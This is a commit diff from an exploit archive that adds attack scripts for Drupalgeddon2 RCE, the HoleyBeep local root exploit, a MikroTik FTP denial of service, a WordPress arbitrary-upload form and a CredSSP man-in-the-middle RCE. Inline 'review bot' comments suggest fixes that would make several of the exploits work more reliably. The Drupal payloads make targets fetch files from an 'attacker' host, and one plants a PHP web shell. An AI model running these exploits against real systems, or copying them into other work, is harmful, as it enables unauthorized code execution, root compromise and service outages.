DB: 2018-04-14

9 changes to exploits/shellcodes

GNU Beep 1.3 - 'HoleyBeep' Local Privilege Escalation

Microsoft Credential Security Support Provider - Remote Code Execution

WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)
MikroTik 6.41.4 - FTP daemon Denial of Service PoC
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
This commit is contained in:
Offensive Security 2018-04-14 05:01:49 +00:00
parent a8b515dd6d
commit bef325a736
8 changed files with 235 additions and 3 deletions


@ -6,9 +6,10 @@ I found the following bug with an AFL-based fuzzer:
When __walk_page_range() is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages. However, do_mincore() assumes that it will always get callbacks for all pages in the range passed to walk_page_range(), and when this assumption is violated, sys_mincore() copies uninitialized memory from the page allocator to userspace.
This bug can be reproduced with the following testcase:
*/
$ cat mincore_test.c
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/mman.h>
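Review bot: in this hunk the shell prompt line `$ cat mincore_test.c` ends up between two `*/` lines, so unless a `/*` that is not shown here reopens the comment, that line sits outside the comment block and the file will no longer compile as C. Either drop the first `*/` so the prose and the `$ cat mincore_test.c` line stay inside one comment that closes right before `#define _GNU_SOURCE`, or move the prompt line into the comment; as rendered, one of the two closing markers is surplus.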

exploits/linux/local/44452.py Executable file

@ -0,0 +1,90 @@
#!/usr/bin/env python3
#
# E-DB Note ~ https://gist.github.com/Arignir/0b9d45c56551af39969368396e27abe8/ec853f14afd6e86fb3f2efce2086e28f33039ddc
# E-DB Note ~ https://sigint.sh/#/holeybeep
#
# This is an exploit for HoleyBeep.
#
# To use it, place any command you want root to execute in `/tmp/x`.
# ```
# $ cat /tmp/x
# echo PWNED $(whoami)
# ```
# The exploit takes a path to write to (the file must already exist) and rewrites its first bytes to /*/x. This means that if it's a shell script, it will execute /tmp/x as its first and only command.
#
# To gain root access, the idea is to use the exploit to overwrite any file in /etc/profile.d/ so it will execute /*/x on the next login, possibly as the root user.
#
# Variants are possible using cron instead of the shell, so you don't have to wait until root logs in.
#
import argparse
import shutil
import os
import subprocess
import time
import signal
import ntpath
TMP_PATH="beep_exploit"
def backup_output(path):
backup_path = ntpath.basename(path + ".bak")
if os.path.isfile(path):
shutil.copy(path, backup_path)
print('Backup made at \'{}\''.format(backup_path))
def main():
parser = argparse.ArgumentParser(description='Holey beep exploit script.')
parser.add_argument('output', metavar='OUTPUT', help='the output file to corrupt')
parser.add_argument('--path', default="/usr/bin/beep", help='path to beep')
parser.add_argument('--time-low', default=6000, type=int, help='time to wait (micro-seconds), lower bound')
parser.add_argument('--time-high', default=6900, type=int, help='time to wait (micro-seconds), higher bound')
parser.add_argument('--no-backup', action='store_true', help='doesn\'t backup the output file')
args = parser.parse_args()
if not args.no_backup:
backup_output(args.output)
devnull = open("/dev/null")
timer = args.time_low
while True:
# Create original symlink
try:
os.remove(TMP_PATH)
except OSError:
pass
os.symlink("/dev/input/event0", TMP_PATH)
# Open subprocess
p = subprocess.Popen([args.path, "--device", TMP_PATH, "-l", "1", "-n", "-l", "2016356911"], stderr=devnull)
time.sleep(timer/2 / 1000000.0)
# Replace symlink
try:
os.remove(TMP_PATH)
except OSError:
pass
os.symlink(args.output, TMP_PATH)
time.sleep(timer/2 / 1000000.0)
# Trigger SIGINT
os.kill(p.pid, signal.SIGINT)
# Kill process if it's sill alive
time.sleep(200.0 / 1000000.0)
os.kill(p.pid, signal.SIGKILL)
# Verify result
with open(args.output, 'rb') as f:
data = f.read(4)
if data == b'/*/x':
print("Done!")
break
timer += 1
if timer > args.time_high:
timer = args.time_low
if __name__ == '__main__':
main()
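Review bot: `devnull = open("/dev/null")` in `main()` opens the file read-only and is then handed to `subprocess.Popen` as `stderr`, so beep's writes to stderr fail with EBADF instead of being discarded; `stderr=subprocess.DEVNULL` (or `open(os.devnull, "w")`) is what is meant. `backup_output` builds the backup name with `ntpath.basename`, the Windows path module; `os.path.basename` is the portable call, and since it strips the directory the `.bak` copy of e.g. `/etc/profile.d/foo.sh` lands in the current working directory, which is sensible for an unprivileged user but should be said in the help text rather than implied. The magic `-l 2016356911` also deserves a comment: it is 0x782F2A2F, whose little-endian bytes are `/*/x`, which is exactly what the `data == b'/*/x'` check at the bottom of the loop looks for; without that note the reader cannot tell why the verification compares against those four bytes.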


@ -0,0 +1,19 @@
################
#Title: MikroTik 6.41.4 Denial of service FTP daemon crash
#CVE: CVE-2018-10070
#CWE: CWE-400
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: https://mikrotik.com/
#Version : 6.41.4 (Released 2018-Apr-05) | All Version
#Date: 13-05-2018
#Category: Network Appliance
#Description: A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending crafted FTP requests on port 21 that begins with many '\0' characters, #preventing the affected router from accepting new FTP connections. The router will reboot after 10 minutes, logging a "router was rebooted without proper shutdown" message.
#POC: https://vimeo.com/264461602
################
for i in `seq 1 100`
do
cat craft | nc -nv <MikroTik IP> 21 &
sleep 2
done
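Review bot: the loop pipes a file named `craft` into `nc`, but the hunk neither includes that file nor says how to build it; since the description only says the requests begin "with many '\0' characters", the PoC cannot be reproduced without a line stating how `craft` is generated (how many NUL bytes and what, if anything, follows them). `#Date: 13-05-2018` is a month after this 2018-04-14 commit and disagrees with the 2018-04-13 date given for 44450 in files_exploits.csv, which looks like a day/month slip and should read 13-04-2018. A stray `#` also splits the description mid-sentence (`'\0' characters, #preventing`), which reads as a second comment marker and should be removed.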


@ -1,3 +1,4 @@
<!--
# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload
# Date: 29-10-2014
# Software Link: https://wordpress.org/plugins/wp-easycart/
@ -17,6 +18,7 @@ http://security.szurek.pl/wordpress-shopping-cart-304-unrestricted-file-upload.h
2. Proof of Concept
Login as regular user (created using wp-login.php?action=register):
-->
<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="datemd5" value="1">
@ -24,6 +26,7 @@ Login as regular user (created using wp-login.php?action=register):
<input value="Upload!" type="submit">
</form>
<!--
File will be visible:
http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%
@ -31,4 +34,5 @@ http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filena
3. Solution:
Update to version 3.0.9
https://downloads.wordpress.org/plugin/wp-easycart.3.0.9.zip
https://downloads.wordpress.org/plugin/wp-easycart.3.0.9.zip
-->
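Review bot: the Solution block lists the download link `https://downloads.wordpress.org/plugin/wp-easycart.3.0.9.zip` on two consecutive lines; one copy should be dropped while the file is being touched. Wrapping the advisory prose in `<!-- ... -->` so that only the `<form>` renders is a reasonable way to make the PoC usable as an HTML page, but the hidden `datemd5` field with value `1` is left unexplained; a short comment saying the server does not validate it would help whoever adapts the form.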

exploits/php/webapps/44448.py Executable file

@ -0,0 +1,21 @@
#!/usr/bin/env
import sys
import requests
print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')
target = raw_input('Enter target url (example: https://domain.ltd/): ')
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'}
r = requests.post(url, data=payload)
if r.status_code != 200:
sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')
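Review bot: the shebang `#!/usr/bin/env` names no interpreter, so running the file directly just invokes `env` and the script never executes; since `raw_input` is Python 2 only, it should read `#!/usr/bin/env python2`. The placeholder `http://attacker/hello.txt` in the `mail[#markup]` value has to be replaced with a host the tester controls, and the success test `if r.status_code != 200: sys.exit("Not exploitable")` is too weak in both directions: a 200 from the AJAX form endpoint does not show that `exec` ran, and the only real evidence is the `hello.txt` the script tells the user to check, which additionally requires `wget` on the target and a web root writable by the PHP user. Note also that `url = target + 'user/register?...'` assumes `target` ends with `/`, as the prompt example shows; a missing slash silently produces a wrong path.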

exploits/php/webapps/44449.rb Executable file

@ -0,0 +1,41 @@
# EDB-Note. Have the contents of "shell" on http://attacker/shell.php
require 'net/http'
# Hans Topo ruby port from Drupalggedon2 exploit.
# Based on Vitalii Rudnykh exploit
target = ARGV[0]
command = ARGV[1]
url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
shell = "<?php system($_GET['cmd']); ?>"
payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec'
uri = URI(url)
http = Net::HTTP.new(uri.host,uri.port)
if uri.scheme == 'https'
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
req = Net::HTTP::Post.new(uri.path)
req.body = payload
response = http.request(req)
if response.code != "200"
puts "[*] Response: " + response.code
puts "[*] Target seems not to be exploitable"
exit
end
puts "[*] Target seems to be exploitable."
exploit_uri = URI(target+"/sh.php?cmd=#{command}")
response = Net::HTTP.get_response(exploit_uri)
puts response.body
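Review bot: `Net::HTTP::Post.new(uri.path)` discards the query string, so the request goes to `/user/register` without `element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax`, and it is that query that makes Drupal render the injected `#post_render` callback; use `Net::HTTP::Post.new(uri.request_uri)`. The payload makes the target run `wget http://attacker/shell.php`, which saves the file as `shell.php`, yet the final request fetches `/sh.php?cmd=...`, so the two names must be reconciled (the local `shell` string is never used either; if it is meant to be served, the EDB note at the top already says to host its contents as `shell.php`). Finally `command` is interpolated unescaped into `URI(target+"/sh.php?cmd=#{command}")`, so any command containing a space or `&` raises `URI::InvalidURIError` or is truncated; wrap it in `URI.encode_www_form_component(command)`.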


@ -0,0 +1,51 @@
# credssp
This is a poc code for exploiting CVE-2018-0886. It should be used for educational purposes only.
It relies on a fork of the rdpy project(https://github.com/preempt/rdpy), allowing also credssp relay.
Written by Eyal Karni, Preempt
ekarni@preempt.com
# Build
## Instructions (Linux)
If you are using Ubuntu 14 , check the install file..
It was tested on Ubuntu 16.04.
```
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
```
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44453.zip
* It assumes a pretty clean inital state. Best to uninstall first relevant compontants such as cryptography,pyopenssl maybe (pip uninstall cryptography).
* A different version of openssl needed to be installed for this to run successfully. The install script does that.
* Please follow the instructions in the described order.
# Running the exploit
Export a certificate suitable for Server Authentication from any domain.
To generate a suitable certificate for the command to execute :
```
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD
```
(exploitc.pem ,exploitk.pem are the generated certificate and private key respectively)
To run the attack script:
```
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer
```
More details are in the usage section of the scripts(--help).
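Review bot: the README never states how the victim's RDP session is made to reach `rdpy-rdpcredsspmitm.py` (which port it listens on and how traffic destined for `TargetServer` is redirected to it), nor whether `CMD` executes on the connecting client or on the server; one sentence under "Running the exploit" would close that gap, since the tool is a man-in-the-middle and is unusable without that positioning. Spelling: "inital" should be "initial", "compontants" should be "components", and "Ubuntu 14" should be "Ubuntu 14.04" to match the "16.04" wording on the next line. The "EDB Mirror" line is also dropped between the fenced block and the bullet list in the Build section; it belongs under its own heading or at the top so the bullets still read as notes on the install steps.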


@ -9642,6 +9642,7 @@ id,file,description,date,author,type,platform,port
44423,exploits/windows/local/44423.py,"GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)",2018-04-09,bzyo,local,windows,
44426,exploits/linux/local/44426.py,"PMS 0.42 - Local Stack-Based Overflow (ROP)",2018-04-09,"Juan Sacco",local,linux,
44438,exploits/windows_x86/local/44438.txt,"DVD X Player Standard 5.5.3.9 - Buffer Overflow",2018-04-10,"Prasenjit Kanti Paul",local,windows_x86,
44452,exploits/linux/local/44452.py,"GNU Beep 1.3 - 'HoleyBeep' Local Privilege Escalation",2018-04-06,Pirhack,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16390,6 +16391,7 @@ id,file,description,date,author,type,platform,port
44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware,
44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android,
44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware,
44453,exploits/windows/remote/44453.md,"Microsoft Credential Security Support Provider - Remote Code Execution",2018-04-13,Preempt,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -34877,7 +34879,7 @@ id,file,description,date,author,type,platform,port
35726,exploits/php/webapps/35726.py,"Getsimple CMS 3.0 - 'set' Local File Inclusion",2011-05-07,"AutoSec Tools",webapps,php,
35727,exploits/php/webapps/35727.txt,"HOMEPIMA Design - 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,webapps,php,
35728,exploits/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",webapps,asp,
35730,exploits/php/webapps/35730.txt,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",webapps,php,80
35730,exploits/php/webapps/35730.html,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",webapps,php,80
35733,exploits/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary Files Deletion / SQL Injection / Cross-Site Scripting",2015-01-09,Technidev,webapps,php,80
35734,exploits/php/webapps/35734.txt,"ZAPms 1.22 - 'nick' SQL Injection",2011-05-09,KedAns-Dz,webapps,php,
35736,exploits/php/webapps/35736.txt,"poMMo Aardvark PR16.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",webapps,php,
@ -39143,3 +39145,6 @@ id,file,description,date,author,type,platform,port
44443,exploits/php/webapps/44443.txt,"WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php,
44444,exploits/php/webapps/44444.txt,"WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)",2018-04-10,ManhNho,webapps,php,
44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,
44448,exploits/php/webapps/44448.py,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php,
44450,exploits/linux/webapps/44450.txt,"MikroTik 6.41.4 - FTP daemon Denial of Service PoC",2018-04-13,FarazPajohan,webapps,linux,
44449,exploits/php/webapps/44449.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo",webapps,php,
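Review bot: row 44450 files the MikroTik FTP daemon crash as `webapps`/`linux` under `exploits/linux/webapps/`, but the file's own header says "Category: Network Appliance" and it is a remote denial of service against a router's port 21, not a web application; the neighbouring appliance rows (44398 Moxa, 44446 F5 BIG-IP) use platform `hardware` with type `remote`, and this row should be classified the same way (and carry `21` in the port column). The row is also inserted out of id order, 44450 sitting between 44448 and 44449, which the rest of the file keeps ascending within each type block.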
